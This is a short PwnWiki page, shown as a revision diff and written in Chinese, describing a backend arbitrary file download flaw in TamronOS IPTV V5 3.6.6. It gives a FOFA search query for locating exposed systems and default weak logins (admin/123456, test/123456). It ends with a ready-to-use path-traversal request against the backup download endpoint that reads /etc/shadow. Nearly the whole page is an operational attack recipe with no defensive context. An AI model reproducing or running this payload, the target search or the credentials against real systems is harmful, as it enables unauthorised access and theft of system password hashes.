Difference between revisions of "TamronOS IPTV系統後台任意文件下載漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> TamronOS IPTV V5 3.6.6 </pre> ==FOFA== <pre> title="TamronOS IPTV系统" </pre> <translate> ==弱口令== </tra...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 13: | Line 13: | ||
<translate> | <translate> | ||
| − | ==弱口令== | + | ==弱口令== <!--T:2--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 23: | Line 23: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:3--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
系統設置 -- 數據庫自動備份,下載文件並且抓包。 | 系統設置 -- 數據庫自動備份,下載文件並且抓包。 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
修改參數,Payload如下: | 修改參數,Payload如下: | ||
</translate> | </translate> | ||
Revision as of 09:31, 13 June 2021
漏洞影響
TamronOS IPTV V5 3.6.6
FOFA
title="TamronOS IPTV系统"
弱口令
admin/123456
test/123456
漏洞利用
系統設置 -- 數據庫自動備份,下載文件並且抓包。 修改參數,Payload如下:
GET /download/backup?name=./../../../../../etc/shadow